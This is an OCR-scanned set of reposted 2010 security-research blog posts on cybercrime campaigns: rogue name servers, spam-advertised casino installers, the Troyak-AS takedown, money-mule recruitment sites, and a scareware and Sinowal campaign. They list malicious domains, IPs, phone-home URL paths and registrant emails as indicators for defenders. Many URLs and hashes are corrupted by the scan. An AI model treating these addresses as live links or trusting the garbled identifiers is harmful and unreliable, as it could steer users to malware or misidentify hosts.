nsl.cebht.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

nsl.dd5ns.com - 61.191.191.61 - Email: li- 
zhenshu@163.com 

nsl.dogmens.com - 208.78.242.185 - Email: 
hmr@data99.com 

nsl.euromarketorder.com - 218.61.126.28 

nsl.fesws.com - 218.61.126.28 - Email: info2@data99.com 

nsl.goatdns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

nsl.hh7ns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

nsl.kindball.com - 218.61.126.28 - Email: 
zhaokaijunlp@163.com 

nsl.mm8ns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

nsl.nn4ns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

nsl.ss6ns.com - 61.191.191.61 - Email: 
shirley9127@hotmail.com 



nsl.wildnn.com - 208.78.242.185 - Email: 
hmr@data99.com 

ns2.gg9ns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

ns2.sruisorehoes.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

ns2.zz8ns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

ns3.bavns.com - 218.61.126.28 - Email: 
shirley9127@hotmail.com 
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ns3.bawns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

ns3.becns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

ns3.bojns.com - 218.61.126.28 - Email: li- 
zhenshu@163.com 

The campaign is a great example of cybercrime-friendly 
affiliate networks, with the cybercriminals in this case 

investing a modest amount of money for the actual 
spamming process, and then earning 30 % flat rate, which 
can 

also be scaling between 20 % to 45 % depending on their 
choice. 


The practice has been around for years. Here are three 
monetizations strategies seeing within the last two years, all 
of which remain an active tactic for fraudsters to take 
advantage of: 

• Brandjacking and monetizing through pseudo-value 
added crapware applications- this practice has been 
profiled in a previous analysis M [4]Cybersquatting Security 
Vendors for Fraudulent Purposes". PandaSecurity's reaction 
back then? Immediate notification of their legal department. 

• SMS micro-payment scams through typosquatting 
and brandjacking - this tactic has already been profiled in 

M [5]l_egitimate Software Typosquatted in SMS Micro-Payment 
Scam" analysis. Compared to the typosquatting in the 
previous scheme, this campaign was monetizing freely 
available software. 

• Abuse of legitimate affiliate networks - In January, 
2009, I [6]profiled and took down a campaign that has 
typosquatted domains for popular applications and was 
advertising them through Google's AdSense in an attempt to 
earn money from a legitimate affiliate network - [7]Conduit's 
Rewards Program. The abuse of these 

networks can be easily taken care of, since the cybercriminal 
that's violating their Terms of Service is exposing himself as a 
legitimate user, with his very own CampaignID. 

You may want to reconsider using an online gambling 
application that's being spammed using a botnet, with the 

actual application crypted using a tool exclusively used by 
malware authors in an attempt to bypass signatures based 
antivirus scanning. 



Amazon's Web Services are aware of this campaign. Action 
against it should be taken shortly. 

This post has been reproduced from [8]Dane ho Danchev's 
blog. Follow him [9Jon Twitter. 

1. http://ddanchev.blo as pot.com/2007/09/dont-pla v- poker- 
on-infected-table.html 

2. http://ddanchev.blo as pot.com/2007/ll/nnalware-servin a- 
online-casinos.html 

3. 

http://www.virustotal.com/analisis/2488cl252a5b3207d7afb 

9b6el4ebb38ff3abcd44aba0del055db88b2b2416b8-12670 

93771 

4. http://ddanchev.blo as pot.com/2008/Q3/cvbersquattin a- 
securitv-vendors-for.html 
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5. http://ddanchev.blo as pot.com/2009/Q7/le a itimate- 
software-t v posauatted~in-sms.html 

6. http://ddanchev.blo as pot.com/20Q9/01/exposin a- 
fraudulent- a oo a le-adwords.html 

7. http://www.conduit.com/ 

8. http://ddanchev.blo as pot.com/ 

9. http://twitter.com/danchodanchev 
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Fotolog's FTLog Malware Campaign Serves Bogus 
Video Codecs (2010-02-26 00:02) 
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Summarizing Zero Day's Posts for February (2010-03- 
02 21 : 20 ) 

The following is a brief summary of all of my posts at 
[l]ZDNet's Zero Day for February, 2010. You [2]can also go 
through [3]previous summaries, as well as subscribe to my 
[4]personal RSS feed, [5]Zero Day's main feed, [6]follow me 
or all of [7]ZDNet's blogs on Twitter. 

Recommended reading - [8]Reports: SQL injection 
attacks and malware led to most data breaches; 
[^Re¬ 
port: Malicious PDF files comprised 80 percent of all 
exploits for 2009 and [10]10 things you didn't know 
about the Koobface gang 

01. [ll]Does Blippy really pose a security risk? 

02. [12]Reports: SQL injection attacks and malware led to 
most data breaches 

03. [13]Scammers phishing for sensitive iPhone data 


04. [14]Report: Malicious PDF files comprised 80 percent of 
all exploits for 2009 

05. [15]The Kneber botnet - FAQ 

06. [16]10 things you didn't know about the Koobface gang 

This post has been reproduced from [17]Dancho Danchev's 
blog. Follow him [18]on Twitter. 

1. http://blo a s.zdnet.com/securit v 

2. http://ddanchev.blo as pot.com/201Q/01/summarizin a -zero- 
davs- PQSts-for.html 
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3. http://ddanchev.blo as pot.com/2010/Q2/summarizin a -zero- 
davs- posts-for- i anuarv.html 

4. http://uodates.zdnet.com/ta a s/dancho+danchev.html? 
t=0&s=0&o=l&mode=rss 

5. http://feeds.feedburner.com/zdnet/securit v 

6. http://twitter.com/danchodanchev 

7. http://twitter.com/zdnetblo as 

8. http://blo a s.zdnet.com/securit v/? p = 5421 

9. http://blo a s.zdnet.com/securit v/? p = 5473 

10. http://blo a s.zdnet.com/securit v/? p = 5452 

11. http://blo a s.zdnet.com/securit v/? p=5401 

12. http://blo a s.zdnet.com/securit v/? p=5421 




































13. http://blo a s.zdnet.com/securit v/? p = 5460 

14. http://blo a s.zdnet.com/securit v/? p=5473 

15. http://blo a s.zdnet.com/securit v/? p=5508 

16. http://blo a s.zdnet.com/securit v/? p = 5452 

17. http://ddanchev.blo as pot.com/ 

18. http://twitter.com/danchodanchev 
207 




Don't Play Poker on an Infected Table - Part Three 
(2010-03-09 22:43) 

The monetization of phony online gambling networks - 
clearly tolerating systematic violation of their TOS - is 

continuing with the scammers behind last month's campaig 

([ljDon't Play Poker on an Infected Table - Part Two) 

spamvertising another portfolio of domains using new 
templates. 

It's worth pointing out that the spammers don't just earn 
revenue every time someone installs the applica¬ 
tion, but also, every time the, now converted visitor, 
interacts financially with the service, a monetization 
approach you'll see in the attached screenshots. 

Detection rates for the spamvertised binaries (downloaded 
from gamez-lux.com and we3tt.com) : 
[2jStarsVIPCasino_Setup.exe - Result: 14/42 (33.33 %); 
[3]GoldenMummyEN.exe - Result: 9/42 (21.43 %); 

















[4JRubyRoyaleEN.exe - Result: 11/42 (26.19 %). Sample 
phone back locations: 

download.thepalacegroupgaming.com; 
pcm3.valueactive.eu; rubyfortune.mgsmup.com 
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Spamvertised domains include: 

adrembovesttes.net - Email: pengjiajie222@163.com 
bonuscasinoslux.net - Email: fgsdvbbvd@qq.com 
bonusgameslux.net - Email: fgsdvbbvd@qq.com 
bonusluxcasinos.net - Email: fgsdvbbvd@qq.com 
bonusluxplays.net - Email: fgsdvbbvd@qq.com 
bonusplayslux.net - Email: fgsdvbbvd@qq.com 
casinosbonuslux.net - Email: fgsdvbbvd@qq.com 
casinosluxclub.net - Email: fgsdvbbvd@qq.com 
casinosluxstar.net - Email: fgsdvbbvd@qq.com 
clopelinesutes.net - Email: fgsdvbbvd@qq.com 
clubgameslux.net - Email: fgsdvbbvd@qq.com 
clubluxgames.net - Email: fgsdvbbvd@qq.com 
club-of-lux.net - Email: fgsdvbbvd@qq.com 
clubs-play.net - Email: fgsdvbbvd@qq.com 


clubvegas-games.net - Email: fgsdvbbvd@qq.com 
gameclubviva.net - Email: fgsdvbbvd@qq.com 
game-lux-club.net - Email: fgsdvbbvd@qq.com 
gamesbonuslux.net - Email: fgsdvbbvd@qq.com 
games-gold.net - Email: fgsdvbbvd@qq.com 
gameslux.net - Email: fgsdvbbvd@qq.com 
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gamesstarlux.net - Email: fgsdvbbvd@qq.com 
gamevivagold.net - Email: fgsdvbbvd@qq.com 
gorxshop.net - Email: sdfxckj@msn.com 
hannoweramtes.net - Email: ftyughsere@qq.com 
lutiok.net - Email: ftgy23fge@126.com 
luxbonusgames.net - Email: fgsdvbbvd@qq.com 
luxbonusplays.net - Email: fgsdvbbvd@qq.com 
luxcasinosbonus.net - Email: fgsdvbbvd@qq.com 
luxclubcasinos.net - Email: fgsdvbbvd@qq.com 
luxclubplays.net - Email: fgsdvbbvd@qq.com 
luxgamesbonus.net - Email: fgsdvbbvd@qq.com 
luxgamesstar.net - Email: fgsdvbbvd@qq.com 


Iuxplaysclub.net - Email: fgsdvbbvd@qq.com 
luxplaysstar.net - Email: fgsdvbbvd@qq.com 
luxs-games.net - Email: fgsdvbbvd@qq.com 
luxstarplays.net - Email: fgsdvbbvd@qq.com 
mollehoukutes.net - Email: guoaiwense@163.com 
murgadobarotes.net - Email: guoaiwense@163.com 
namedosaras.net - Email: ftyughsere@qq.com 
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pay3500win.net - Email: dfgdvbcv@sina.com 
playeuro777.net - Email: fghvvbcfgds@tom.com 
playeuro888.net - Email: fghvvbcfgds@tom.com 
playglobal777.net - Email: dfhhjg4ee@163.com 
playsclublux.net - Email: fgsdvbbvd@qq.com 
playsluxclub.net - Email: fgsdvbbvd@qq.com 
realcash-mine.net - Email: dfgdvbcv@sina.com 
realcash-offer.net - Email: dfgdvbcv@sina.com 
realcash-wins.net - Email: dfgdvbcv@sina.com 
regal-jackpot.net - Email: dfgdvbcv@sina.com 
regalvegas-online.net - Email: dfgdvbcv@sina.com 


royalcasino777.net - Email: edwfrsdf@126.com 

royalcasino888.net - Email: edwfrsdf@126.com 

royalvegas-play.net - Email: dfgdvbcv@sina.com 

satregonovates.net - Email: pengjiajie222@163.com 

softaserutes.net - Email: ftyughsere@qq.com 

softoutnertes.net - Email: ftyughsere@qq.com 

softuoplowtes.net - Email: ftyughsere@qq.com 

stargameslux.net - Email: ftyughsere@qq.com 

starluxcasinos.net - Email: ftyughsere@qq.com 

sundowutortes.net - Email: guoaiwense@163.com 

vegasclubsgame.net - Email: fgsdvbbvd@qq.com 

vegasgamesclub.net - Email: fgsdvbbvd@qq.com 

Sample monetization in action: 
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Phony affiliate networks are reserve the right to forward the 
responsibility for the malicious activity to participants 
violating their Terms or Service. A violation that earned both 
parties significant amounts of money, in between 

The "don't play poker on an infected table" series are prone 
to expand. 


Related posts: 

[5] Don't Play Poker on an Infected Table - Part Two 

[6] Don't Play Poker on an Infected Table 

[7] Malware Serving Online Casinos 

This post has been reproduced from [8]Dancho Danchev's 
blog. Follow him [9Jon Twitter. 

1. http://ddanchev.blo as pot.eom/2010/02/dont-pla v- poker- 
on-infected-table-part.html 

2 . 

http://www.virustotal.com/analisis/ad58e2bfc9a66el5b3138 
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3. 
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http://www.virustotal.com/analisis/9bbda63b61d7b94f8b5bb 

f94da7eca948422af758ab6690fe30ed7f27e71200e-12681 

61379 

5. http://ddanchev.blo as pot.com/2010/Q2/dont-pla v- poker- 
on-infected-table-part.html 
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AS50215 Troyak-as Taken Offline, Zeus C&Cs Drop 
from 249 to 181 (2010-03-10 21:01) 

2nd update for Friday, March, 12, 2010 - [l]Troyak-AS is 
down again -" This AS is not currently used to announce 
prefixes in the global routing table, nor is it used as a visible 
transit AS. " 

UPDATED: Friday, March, 12, 2010 -Troyak-AS peering 
courtesy of [2]AS25189 - NLINE-ASJSC Nline. Since 

the entire Troyak-as takedown campaign is turning into an 
infinite loop, it's time for a "terminating condition". 

2nd update for Thursday, March 11, 2010: Troyak-AS is 
back from the dead. Upstream courtesy of [3]AS8342 

- RTCOMM-AS RTComm.RU Autonomous System. The good 
news? Troyak's Zeus C &Cs are still offline. 

UPDATED: Thursday, March 11, 2010 - [4]TROYAKAS 
Starchenko Roman Fedorovich is dead again -" This AS is not 
currently used to announce prefixes in the global routing 
table, nor is it used as a visible transit AS. " 












UPDATED: Troyak-as is now [5]AS44051 YA-AS 
Professional Communication Systems. 

[6]AS50215 Troyak-as, the cybercrime-friendly virtual 
neighborhood that was a key component in the hosting 

infrastructure for all of the Zeus-crimeware serving 
campaigns during Q1 of 2010, has been taken offline, 
resulting in a pretty evident drop in Zeus C &Cs, according to 
this graph courtesy of the [7]ZeusTracker. 

AS50215 Troyak-as (ctlan.net; prombd.net) was of course 
the tip of the iceberg, directly or indirectly interacting with 
the following ASs: 

• AS31366 - smaiishop-as Stebluk Vladimir 
Vladimirovich bid 

• AS44107 - PROMBUDDETAL-AS Prombuddetai LLC 

• AS50369 - ViSHCLUB-as Kanyovskiy Andriy 

• AS49934 - VVPN-AS PE Voronov Evgen Sergiyovich 

• AS47560 - VESTEH-NET-as Vesteh LLC 

Don't pop the corks just yet, their customers, in particular 
their money mule recruitment customers are already 

migrating to the competition. 

From a cybercriminal's perspective, such minor operational 
glitches don't undermine the business model. Sadly, it's 214 

more cost-effective to build a new botnet, compared to trying 
to gain access to the old one. What truly undermines their 
business model is their inability to utilize the monetization 
vector. 



AS50215 TROYAK-AS Starchenko Roman Fedorovich 
activity during Ql, 2010: 

[8] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[9] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[10] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[11] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[12] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

This post has been reproduced from [13]Dancho Danchev's 
blog. Follow him [14]on Twitter. 
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5. http://cidr-report.or a/ca i-bin/as-report?as=AS50215 

6. http://www.abuse.ch/?p=2417 

7. https://zeustracker.abuse.ch/mon itor. ph p?filter= on line 

8. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access -1 h emed-spam-campai a n.html 































9. http://ddanchev.blo as pot.com/2010/01/pushdo-servin a- 
crimeware-client-side.html 


10. http://ddanchev.blo as pot.com/2010/02/photoarchive- 
crimewareclient-side.html 


11. http://ddanchev.blo as pot.com/2010/02/tax-report- 
themed-zeusclient-side.html 


12. http://ddanchev.blo as pot.com/2010/02/keepin a -nnone v- 
mule-recruiters-on-short.html 


13. http://ddanchev.blo as pot.com/ 

14. http://twitter.com/danchodanchev 
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Money Mule Recruiters on Yahooi's Web Hosting 
(2010-03-11 20:41) 

UPDATED: Saturday, March 13, 2010 - Yahoo! Web 
Hosting abuse just pinged me that 11 We have investigated 
the sites and taken the necessary action". 

Just how dumb, or perhaps ingenious is a cybecriminal that 
would host his money mule recruitment opera¬ 
tions using Yahooi's Web Hosting services? Is the reputable 
hosting location, worth the risk of having their campaigns 
taken down much easily than if there were hosting them on 
the bad reputation block, and would have never bothered 
replying to abuse notifications? 

Whatever the motivation of the people behind this money 
mule recruitment campaign, they are currently us- 





















ing Yahoo! Web Hosting. Domains in question, including 
contact details: 
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- Reed Financial Services - reed-fs.com - 68.180.151.74 
555 11th St NW 

Washington, DC 20004 
Phone numbers: 

(866) 863-6438 
(202) 355-6678 (FAX) 
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- Stevens Financial Solutions - stevensfs.com - 
98.136.50.138; 69.147.83.187; 69.147.83.188 

Postal address: 

Stevens Financial Solutions 

Bahnhofstrasse 32 

CFi-8001 Zurich, Switzerland 

Value Added Tax Nr.: 428 643 

Phones and fax no's: 


Phone: +41 (43) 219-2551 


Fax 1: +41 (43) 219-2551 

Fax 2: +1 (866) 703-7622 US Toll-Free 

- Waters & Co. LLP - watersllp.com - 216.39.57.104 
400 East Pratt Street, 

Baltimore, MD 21202 
United States 
Phone numbers: 

(443) 524-9221 
(443) 524-9221 (FAX) 
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- Nilson Financial Solutions - nilson-fs.com - 98.136.92.76; 
98.136.92.77; 98.136.92.78 

Nilson Financial Solutions 

Bahnhofstrasse 32 

CFI-8001 Zurich, Switzerland 

Value Added Tax Nr.: 428 643 

Phones and fax no's: 

Phone: +41 (43) 219-2551 

Fax 1: +41 (43) 219-2551 


Fax 2: +1 (866) 472-0560 US Toll-Free 

Upon submitting the personal details, the potential money 
mule is required to send a scanned copy of their 

ID or driving license: 

• 11 Familiarize yourself with all clauses of the contract. Fill 
the contract and send us a scanned copy of it to the email 
address info@watersllp.com or by fax: (443) 524-9221. The 
contract becomes valid from the moment of the 

reception of the correctly filled copy of the contract. You 
should be familiar with that the validity of the contract in the 
electronic form is completely identical to the contract signed 
at personal presence of both parties.* To pass the procedure 
of identity verification in order to prevent fraudulent 
registrations, you are required to send a scan of valid ID or a 
driving license to the e-mail: info@watersllp.com or by fax: 
(443) 524-9221. We guarantee full confidentiality of your 
personal information, more information on this matter you 
will find in our Privacy Policy PLEASE LET US KNOW BY EMAIL 
WHEN YOU WILL FAX BACK/EMAIL AS ATTACHEMENT THE 
CONTRACT AND 

APPLICATION FORM WITHIN 48 HOURS. " 
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Yahool's Web Hosting abuse team has been notified of the 
campaigns, and will nuke the offline a.s.a.p 

Related coverage of money laundering in the context 
of cybercrime: 


[ 1 ]Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[2] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[3] Keeping Reshipping Mule Recruiters on a Short Leash 

[4] Keeping Money Mule Recruiters on a Short Leash 

[5] Standardizing the Money Mule Recruitment Process 

[6] lnside a Money Laundering Group's Spamming Operations 

[7] Money Mule Recruiters use ASProx's Fast Fluxing Services 

[8] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [9]Dancho Danchev's 
blog. Follow him [10]on Twitter. 
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Sea re ware, Sinowal, Client-Side Exploits Serving 
Spam Campaign in the Wild (2010-03-13 00:17) 

AS50215 Troyak-as customers are back, with an ugly mix 
of scareware, sinowal, and client-side exploits serving 
campaign using the " You don't have the latest version of 
Macromedia Flash PlayeF theme. Quality assurance is also in 
place this time, with the client-side exploit serving domains 
using a well known "[1] function nerot' obfuscation 
technique in an attempt to bypass link scanners. 

Let's dissect the campaign, list all the typosquatted and 
spamvertised domains, the client-side exploit serving 

iFrames and the actual scareware. 

Sampled 

URLs 

archives 

.wesh.kr/archive0715/?id=test@test.com; 

anonymousfiles 















.wesh.or.ki7archive0715/?id=test@test.com. 
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Spamvertised and typosquatted currently active domains 
include: 

enyg.ne.kr - Email: EneesC9563@hotmail.com 
enyk.ne.kr - Email: EneesC9563@hotmail.com 
enyz.ne.kr - Email: EneesC9563@hotmail.com 
enyg.kr - Email: EneesC9563@hotmail.com 
enyk.kr - Email: EneesC9563@hotmail.com 
enyg.co.kr - Email: EneesC9563@hotmail.com 
enyk.co.kr - Email: EneesC9563@hotmail.com 
enyt.co.kr - Email: EneesC9563@hotmail.com 
enyz.co.kr - Email: EneesC9563@hotmail.com 
enyg.or.kr - Email: EneesC9563@hotmail.com 
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enyk.or.kr - Email: EneesC9563@hotmail.com 
enyt.or.kr - Email: EneesC9563@hotmail.com 
enyz.or.kr - Email: EneesC9563@hotmail.com 
enyt.kr - Email: EneesC9563@hotmail.com 


enyz.kr - Email: EneesC9563@hotmail.com 
erase.co.kr - Email: PalacidoL6860@hotmail.com 
erase.ne.kr - Email: PalacidoL6860@hotmail.com 
erase.or.kr - Email: PalacidoL6860@hotmail.com 
erasm.co.kr - Email: PalacidoL6860@hotmail.com 
erasm.kr - Email: PalacidoL6860@hotmail.com 
erasm.ne.kr - Email: PalacidoL6860@hotmail.com 
erasm.or.kr - Email: PalacidoL6860@hotmail.com 
erasv.co.kr - Email: PalacidoL6860@hotmail.com 
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erasv.kr - Email: PalacidoL6860@hotmail.com 
erasv.ne.kr - Email: PalacidoL6860@hotmail.com 
erasv.or.kr - Email: PalacidoL6860@hotmail.com 
erasw.co.kr - Email: PalacidoL6860@hotmail.com 
erasw.kr - Email: PalacidoL6860@hotmail.com 
erasw.ne.kr - Email: PalacidoL6860@hotmail.com 
erasw.or.kr - Email: PalacidoL6860@hotmail.com 
wesc.ne.kr - Email: PalacidoL6860@hotmail.com 
wese.co.kr - Email: PalacidoL6860@hotmail.com 
wese.kr - Email: PalacidoL6860@hotmail.com 



wese.or.kr - Email: PalacidoL6860@hotmail.com 
wesh.co.kr - Email: PalacidoL6860@hotmail.com 
wesh.kr - Email: PalacidoL6860@hotmail.com 

wesh. or.kr - Email: PalacidoL6860@hotmail.com 

wesi. co.kr - Email: PalacidoL6860@hotmail.com 
wesi.kr - Email: PalacidoL6860@hotmail.com 
wesi.or.kr - Email: PalacidoL6860@hotmail.com 
wesw.co.kr - Email: PalacidoL6860@hotmail.com 
wesw.kr - Email: PalacidoL6860@hotmail.com 
wesw.ne.kr - Email: PalacidoL6860@hotmail.com 
wesw.or.kr - Email: PalacidoL6860@hotmail.com 
Name servers of notice: 

nsl.hr-skc.com - 74.117.63.218 - Email: hr@skrealty.net 

nsl.welcomhell.com - 74.117.63.218 - Email: 
klincz@aol.com 

nsl.skcstaff.com - 87.117.245.9 - Email: 
staffing@skhomes.com 

nsl.limeteablack.net - 87.117.245.9 - Email: 
doofi@usa.com 

Upon visiting the spamvertised links, the cybercriminals are 
then enticing the user into manually downloading 



update.exe - [2]Trojan:Win32/Alureon.DA; Mal/FakeAV-CS - 
Result: 10/42 (23.81 %). 

The sample phones back to the following location, 
downloading the actual scareware (setup.exe - 
[3]Mal/FakeAV-CS; FakeAlert-FQ - Result: 9/41 (21.96 %) ), 
and ensuring the the cybercriminals phone back with the 
affiliate ID to 

confirm a successful installation: 

- gotsaved.cn/css/ void/crcmds/main - 91.212.132.7 - 
Email: georgelem@xhotmail.net 

gotsaved.cn/css/ void/srcr.dat 

gotsaved.cn/css/ void/crcmds/install 

gotsaved.cn/css/ _void/crfiles/serf 

gotsaved.cn/css/ _void/crcmds/builds/bbr 

gotsaved.cn/css/ _void/crfiles/bbr 

gotsaved.cn/css/ _void/knock.php 

gotsaved.cn/css/ void/crcmds/extra 

- automaticallyfind.org/?gd=KCo7MD8uPS4iPA= = 
&affid=XF5W &subid=AQoY &prov= &mode=cr &v=6 
&newref= 1 

- 69.39.238.101 - Email: larrypenn@xhotmail.net 

automaticallyfind.org/?gd=KCo7MD8uPS4iPA= = 
&affid=Wg= = &subid=GwocGwEEHQ== &prov= 
&mode=cr 



&v=6nkr 
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beinahet.com/readdatagateway. php?type=stats 

&affid=319 

&subid=new 

&version=3.0 

&adwareok 

193.169.234.30 - Email: Vrapus.Kamat@gmail.com 

- mega-fast.org/page2/setup - 91.212.132.8 - Email 
Vrapus.Kamat@gmail.com 

mega-fast.org/page2/setup0 

Parked on 91.212.132.5, 91.212.132.7, 91.212.132.8 

(gotsaved.cn) are also: 

airportweb.cn - Email: JoannaWilhelm@xhotmail.net 
gotsaved.cn - Email: georgelem@xhotmail.net 
gotsick.cn - Email: georgelem@xhotmail.net 
gottired.cn - Email: georgelem@xhotmail.net 
gotunderway.cn - Email: georgelem@xhotmail.net 


gotupset.com - Email: DianaFister@xhotmail.net 
methodsweb.com - Email: bryantlew@xhotmail.net 
pickingweb.cn - Email: JoannaWilhelm@xhotmail.net 
prima-fast.org - Email: Vrapus.Kamat@gmail.com 
publishingweb.cn - Email: JoannaWilhelm@xhotmail.net 
quickfreescan.org - Email: GrantPursell@xhotmail.net 
scanerborn.cn - Email: KristinDunton@xhotmail.net 
scanerexcuse.cn - Email: KristinDunton@xhotmail.net 
scanernurse.cn - Email: KristinDunton@xhotmail.net 
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scanerwhatever.cn - Email: KristinDunton@xhotmail.net 

senateweb.com - Email: bryantlew@xhotmail.net 

webdocuments.cn - Email: JoannaWilhelm@xhotmail.net 

Parked on 69.39.238.101 (automaticallyfind.org) are also 

guysfind.org - Email: larrypenn@xhotmail.net 

automaticallyfind.org - Email: larrypenn@xhotmail.net 

findalternate.org - Email: larrypenn@xhotmail.net 

As we've already seen in previous campaigns, each and 
every domain is embedded with an iFrame, which this time 


behaves differently, much more covertly than the one used 
before, ylwgheakrozn.com /ld/novl/ - 66.135.37.211 - 

Email: getilakll@yahoo.com would attempt to load the 
following: 

- ylwgheakrozn.com /nte/novl.php 

- ylwgheakrozn.com /nte/avorplnovl.py 

- ylwgheakrozn.com /nte/NOVl.py 

• The folks at FireEye have covered the M [4]function nerot" 
in depth in January, 2010, and have analyzed a campaign 
using a similar structure as the current one 

But would also attempt to load the nonexistent: 

- ylwgheakrozn.com /nte/AVORPlNOVl.exe 
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- ylwgheakrozn.com /nte/NOVl.exe 

- ylwgheakrozn.com /nte/NOVl.asp 

- ylwgheakrozn.com /nte/NOVl.html 

The campaign ultimately serves [5]Backdoor.Sinowal.DJ; 
Result: 

15/42 (35.71 %) through an obfuscated 

[6]Exploit.PDF-JS.Gen - Result: 18/42 (42.86 %). 

Parked on same IP where the iFrame domains is, is the 
remaining portfolio of domains presumably prepared 


for rotation, in fact some of them are already involved in 
malicious activity. 

At 69.174.245.148; 75.125.212.58; 66.135.37.211; 
190.120.228.44 and 76.74.238.94 is the rest of the client- 

side exploits serving domains portfolio: 

aabtiktadve.com - Email: adminhhhPolego@hotmail.com 
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acdcwpbathr.com - Email: vikolr5ty@yahoo.com 
acdlsvladve.com - Email: ade45Meehan4@yahoo.com 
aghgiqfathr.com - Email: eeeDalmanbei@yahoo.com 
balhimana.com - Email: Malachowski@yahoo.com 
dbcavsaddve.com - Email: Wilfredo-admin@yahoo.com 
ddehkyhddve.com - Email: admnBowgrenfd@yahoo.com 
ddewphwddve.com - Email: W-Leetl210@yahoo.com 
dhjgjwgddve.com - Email: adminSeaborn09@yahoo.com 
dhjvnvvddve.com - Email: adminSeaborn09@yahoo.com 
diaiscjdthr.com - Email: Nelsondwer4@yahoo.com 
ejsinlbyidid.com - Email: nerForbes09@yahoo.com 
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fgdchevuno.net - Email: 22232344sad22blyj@msanz.com 


fgnmgojuno.com - Email: 2223234422awbyj@msanz.com 

fgxwuyyuno.com - Email: 2223234422asdbyj@msanz.com 

ghedifauno.com - Email: 2223234422asdlbyj@msanz.com 

ghtsuumuno.com - Email: 
222323442qwle2byj@msanz.com 

hdewptwhdve.com - Email: zekoAdmin@yahoo.com 

hhjvnzvhdve.com - Email: qwMeier34ed@hotmail.com 

jcdcwxbjthr.com - Email: kovin78213@yahoo.com 

jefshosjdve.com - Email: Computer66Heads@yahoo.com 

kbclyokkthr.com - Email: admHalliday666@yahoo.com 

kdvarmgibtp.com - Email: aatrganzlO@yahoo.com 

lbckqbkldve.com - Email: W-Leetl210@yahoo.com 

mcdcwjbmthr.com - Email: Lobertzqeq437@yahoo.com 

mghvegumthr.com - Email: eeeDalmanbei@yahoo.com 

mjisuvrmthr.com - Email: domainHodge2@hotmail.com 
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pdecaxcpdve.com - Email: Computer66Heads@yahoo.com 
pfgeeeepdve.com - Email: admndomsalel2@yahoo.com 
pfgfgdepthr.com - Email: finsky777admin@gmail.com 


pfgoykopdve.com - Email: Wildeysgh67@yahoo.com 
pfgtihtpdve.com - Email: admnBowgrenfd@yahoo.com 
pianwinpdve.com - Email: Wilfredo-admin@yahoo.com 
qabaqbyqthr.com - Email: admHalliday666@yahoo.com 
qabtihtqdve.com - Email: Lawrencee45sd@yahoo.com 
qcdvnhvqdve.com - Email: Lawrencee45sd@yahoo.com 
qefshvsqdve.com - Email: Wildeysgh67@yahoo.com 
qghgixfqthr.com - Email: NguyenlO@gmail.com 
qghkqfkqdve.com - Email: adminsales@yahoo.com 
qghpbapqdve.com - Email: qwMeier34ed@hotmail.com 
qghvexuqthr.com - Email: Richmondsw3d@yahoo.com 
qhjcwfbqthr.com - Email: asVeles45@hotmail.com 
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qlpkoxmdzxsb.com - Email: 
QLPKOXMDZXSB.COM@domainservice.com 

sjidamcsthr.com - Email: Gallippihu67@yahoo.com 

sjinfcmsthr.com - Email: 
domainadmin@navigationcatalyst.com 

tbcpbxptdve.com - Email: hotersl2admin@yahoo.com 

tfgoyqotdve.com - Email: Brodeursdfrtr@yahoo.com 

thjgjcgtdve.com - Email: Harrisasasd@yahoo.com 



tiashostdve.com - Email: aaLehmann34s@yahoo.com 

ubcvesuuthr.com - Email: kovin78213@yahoo.com 

uefxrwxudve.com - Email: admndomsalel2@yahoo.com 

wghgiwfwthr.com - Email: Richmondsw3d@yahoo.com 

yvbbpgrixovr.com - Email: dioSinghl2@yahoo.com 

Monitoring of the campaign is ongoing, updates will be 
posted as soon as new developments emerge. 

Related Troyak-as activity and previous campaigns 
maintained by their customers: 

[7] AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop from 
249 to 181 

[8] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[9] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[10] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[11] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[12] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

This post has been reproduced from [13]Dancho Danchev's 
blog. Follow him [14]on Twitter. 



1. http://blo a .fireeve.com/research/2010/01/odf- 
obfuscation.html 

2 . 

http://www.virustotal.com/analisis/13deb97feb24884914143 

139fel73fleefe63c6blb40d95b48c835455el810af-12684 

11432 

3. 

http://www.virustotal.com/analisis/0fa30043f45fe0e9f7fd64b 

Ie9440b8ea7eca8431b73388fll84c3ee83b2335a-12684 

23943 

4. http://blo a .fireeve.com/research/201Q/01/pdf- 
obfuscation.html 

5. 

http://www.virustotal.com/analisis/78df316892ec75fb2dl7b 

9a589aed980771bcc6349325f02fl007b21e7d850ba-12684 

19059 

6 . 

http://www.virustotal.com/analisis/db46413231ea9bed8f4d8 

b40bc820ae7015ac9e6226c9ffe996fef975128b511-12684 

33015 

7. http://ddanchev.blo as pot.com/2010/03/as5Q215-trovak- 
as-taken-off1ine-zeus-c.html 




























8. http://ddanchev.blo as pot.com/2010/01/outlook-web- 
access-themed-soam-camoai a n.html 


9. http://ddanchev.blo as pot.com/2010/01/pushdQ-servin a- 
crimeware-client-side.html 


10. http://ddanchev.blo as pot.com/2010/02/photoarchive- 
crimewareclient-side.html 


11. http://ddanchev.blo as pot.com/2010/02/tax-report- 
themed-zeusclient-side.html 


